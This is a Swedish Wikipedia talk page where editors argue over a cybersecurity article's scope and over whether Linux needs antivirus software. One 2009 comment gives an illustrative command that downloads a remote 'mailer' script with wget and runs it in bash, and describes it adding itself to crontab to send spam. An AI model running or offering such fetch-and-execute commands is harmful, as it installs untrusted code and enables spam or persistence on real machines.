Diskussion:Cybersäkerhet

IMO är det lite för mycket av "goda råd" från en hacker till andra här. Stilen borde stramas upp lite. /RaSten 13 juni 2005 kl.23.05 (CEST)

Instämmer. De olika typerna av hot som finns som rubriker här borde beskrivas som vad de är, inte som reklam för program för att undvika dem. Dessutom borde de placeras i ett samanhang med andra risker (programfel, användarslarv, insiderversamhet). --Kaj@kth.se 19 juni 2005 kl.12.08 (CEST)

Lägger märke till att den här artikeln är huvudartikel i kategorin datasäkerhet. Det mesta av de tveksamma underrubrikerna här hanteras dessutom i egna artiklar i kategorin, så det kanske vore vettigt att helt enkelt ta bort dem här? Eventuellt kunde vi dessutom ha lite "råd och tips för att inte ta onödiga risker" här, men i så fall göra dem generellare, inte som reklam för enskilda produkter. --Kaj@kth.se 19 juni 2005 kl.18.32 (CEST)

Nu har jag "städat" lite här, de "goda råden" har blivit lite kortare och generellare. Men mer "encyklopedisk" text skulle nog inte skada, så jag låter kk sitta kvar. Mer hjälp behövs på den här artikeln ... --Kaj@kth.se 19 juni 2005 kl.19.43 (CEST)

Jag tycker det känns lite oklart vad artikeln egentligen handlar om, är det "datasäkerhet", "datorsäkerhet" eller "tips för dig som tyvärr måste köra windows" den ska innehålla? Jag är av åsikten att "datasäkerhet" ska beskriva begreppet datasäkerhet och att "tips och råd" kan ligga nån annanstans, t.ex under "datorsäkerhet" där jag tycker de passar bättre. Klaga på mig så vi får en diskussion här nu! -FarbrorJan 23 december 2005 kl.12.26 (CET)

Jag håller helt med! Jag har (för ganska länge sedan) rensat bort en massa tips om enskilda program för viruskontroll etc (på windows) och ersatt med ett första försök till översikt (och gjort de "praktiska råd" som fick vara kvar lite generellare). Om du har kunskapen och orken för att fortsätta det arbetet vore det bra! --kaj@kth.se 24 december 2005 kl.23.30 (CET)

IT-säkerhet artiken ger en mer formell bild. Det som berörs i artikeln är bara några små mekanismer som ingår i IT-säkerhet, mao jag har svårt att se vad är meningen, förtutom att den kanske kan upplyssa en hemanvändare på mikro-nivå vad det äre frågan om. Zman 28 oktober 2006 kl. 10.49 (CEST)[svara]

Diskussioner om sammanslagning bör ske på Diskussion:IT-säkerhet. // Mankash 13 oktober 2008 kl. 08.45 (CEST)[svara]

Antivirusprogram är ett fenomen specifikt för vissa operativsystem, bland annat DOS och Windows. På system som Unix är deras värde (utom i vissa fall) mycket tvivelaktigt: sabotageprogram av de slag de är effektiva mot är ytterst sällsynta, så till den grad att fel i programmet själv kan vara en större risk. Antivirusprogrammen bygger också på en säkerhetsmodell som bryter mot Unix-traditionen.

Ett antivirusprogram bygger på att det har en databas med vilket det känner igen tidigare identifierade sabotageprogram och varianter på dessa. Det kan alltså inte skydda mot sakkunnigt genomförda riktade anfall. Detta, och maskar som utnyttjar säkerhetshål i serverprogram, har traditionellt varit de största hoten mot Unix-maskiner. De senare stoppas genom att säkerhetshålen täpps till, vilket i akuta fall inte torde ta mycket mer tid än att uppdatera virusdatabasen. Detta gäller också då det finns säkerhetshål i webbläsare, bildvisningsbibliotek eller e-postprogram.

För hemanvändare gäller hoten också i hög grad installation av opålitlig programvara. I Unix saknas den förvirring mellan normala datafiler och programfiler som gör att Windows-användare installerar sabotageprogram av misstag. Att köra eller installera ett program kräver en medveten insats. Att avhålla sig från att köra program av okänt ursprung är ett mycket bättre skydd mot sabotageprogram än att först kontrollera programmet mot virusdatabasen.

Sedan har vi problemet med att skilja mellan sabotageprogram och programvara installerad med avsikt. Typiska sabotageprogram kan till sitt beteende komma mycket nära viss typ av medveten datoranvändning. Jag har inte följt med utvecklingen, men jag kan tänka mig att detta är ett större problem i den mer heterogena omgivning som Unix-liknande operativsystem utgör, i synnerhet då andelen expertanvändare fortfarande torde vara rätt hög. Dessutom är erfarenheten av antivirusprogram på Unix mycket mindre (om vi undantar e-postfiltrering och liknande).

--LPfi 3 december 2009 kl. 12.48 (CET)[svara]

Clam AntiVirus är ett exempel på antivirus för Linux system, så antivirus är inte specifika för DOS och Windows. Jag håller med om att det sätt som UNIX, BSD etc. är uppbyggt med tanke på säkerhet skiljer sig åt mot hur DOS/Windows är då de senare tradionellt sett har haft root/superuser rättigheter hela tiden. Moderna antivirusprogram känner också av beteende, ex. jobbar Panda Antivirus så. GameOn 3 december 2009 kl. 13.06 (CET)[svara]

Jag har lagt in en källa på att det är en myt att det inte finns virus för Linux och omformulerat meningen. Jag ser gärna en källa som bestrider det jag lagt in om någon vill ändra. GameOn 3 december 2009 kl. 13.20 (CET)[svara]

Clam AntiVirus används främst för att rensa bort skadlig kod avsedd för Windows ur e-post hanterad av ett Linux-system. Visst finns det virus för Linux, men som jag skrev ovan är de ytterst sällsynta och risken att ett sabotageprogram utnyttjar en svaghet i antivirusprogrammet torde vara av samma storleksordning som att programmet är till nytta.

"Källan" för att Linux säkerhet är en myt förtjänar inte att vara med. Ett stycke som inte säger mer än att det är en myt! Vilken auktoritet har skribenten? Men detta är en lång diskussion som jag inte hinner med idag.

--LPfi 3 december 2009 kl. 15.48 (CET)[svara]

Jag har utökat med en till (och förhoppningsvis bättre) källa. Jag kommer inte motsätta mig att du tar bort den första om du tycker den är för dålig, det finns ingen anledning att ha flera källor. Vi ska ju inte "tävla" i antalet källor utan i så fall kvalitén på dem, eller omformulera ytterliggare en gång. Och ja, jag visste redan vad Clam AntiVirus oftast används till (även om artikeln på svenska wikipedia tyvärr lämnar mycket att önska), den finns också med på Asus EEE-datorer som inte agerar mailservrar. Om vi återgår till texten så kanske man kan skriva något som "Antivirusprogram är bra i de flesta operativsystem, även om det finns olika åsikter om de behövs i ex. Linux<ref>http://www.mylro.org/content/view/1088/53/</ref>" och den källan jag la in nu? GameOn 3 december 2009 kl. 22.36 (CET)[svara]

Jag tycker att "åtminstone Windows" som du skrev tidigare är ok. Sedan kan man ju utveckla resonemanget om andra operativsystem om man vill. "De flesta" är jag inte med på: dels är antalet operativsystem odefinierat, och därmed också uttrycket, dels tror jag inte på det i sak. Vilka operativsystem finns det antivirusprogram för? DOS, Windows, Mac, Mac X , ett antal unixar och unixliknande operativsystem, kanske BeOS, och några operativsystem för smarta mobiltelefoner. Knappast väl många andra? Om man inte tycker att Unix & co behöver antivirusprogram så är det svårt att nå upp till en majoritet.

Din andra källa skriver "[to get a virus] is extremely less likely on a Linux based PC". Det är detta som är poängen. I år har jag fått en varning om ett fel i clamavis, som kunde möjliggöra inbrott (om jag minns rätt). Däremot har jag inte fått någon varning om något virus som de facto skulle utgöra ett hot.

Jag noterade inte att länken från din första källa sannolikt var den källa du egentligen avsåg. Det är en vettig artikel, men slutar "However, if you're in a Linux-only environment, the only thing you should ask yourself is... what to do with the money you would have otherwise spent on antivirus products." Som källa för att man bör installera antivirus – hm...

Linux är inte immunt mot sabotageprogram, men jag tvivlar alltså fortfarande på att antivirusprogram är svaret. Att Asus installerar antivirus kan ha andra orsaker än det konkreta behovet, t.ex. kan det vara nyttigt vid eventuella skadeståndskrav ("vi gjorde vad vi kunde") eller så kan det vara en marknadsföringskanal för antivirusföretagen (en konspirationsteori måste man väl ha i varje sammanhang ;-) )

Vad gäller att känna av beteende, vad skall antivirusprogramvaran göra i följande situation

wget http://168.192.8.2/scripts/mailer && /bin/bash ./mailer & exit

Då mailer-skriptet hämtar meddelande och adressater över nätet, installerar sig själv i crontab och skickar iväg meddelandet till adressaterna. Användaren avslutade sessionen med "exit" och kan ha gått bort innan skriptet laddats och kan analyseras. Skall antivirusprogramvaran stoppa försändelsen med antagandet om att det är frågan om skräppost (eventuellt efter att ha kört det genom ett skräppostfilter? Är situationen en annan om kommandoraden fanns inbyggd i ett annat skript under namnet hej_på_dig, bifogat till ett e-postmeddelande?

Poängen här är att jag tror att antivirusprogramvaran främst är anpassad till de typiska Windows-virusen och står sig rätt slätt mot det en Unix-person skulle skriva ihop – och att mycket av det sabotageprogram gör är mycket lika vad en Unix-administratör kan vilja göra.

--LPfi 4 december 2009 kl. 11.56 (CET)[svara]

Jag lade nu tillbaka "åtminstone i Windows", åtföljt av en del mindre omformuleringar. Motiveringarna finns ovan. De två referenserna för "också Linux" tycker jag är värdelösa, men jag behåller dem tillsvidare, om någon vill kolla. Det är också möjligt att man med prenumerations, javascript eller dylikt ser något jag inte ser. Flyttar dem dock att stöda "nyttan omdebatterad", vilket jag tycker de stöder lika bra. --LPfi 15 augusti 2010 kl. 22.55 (CEST)[svara]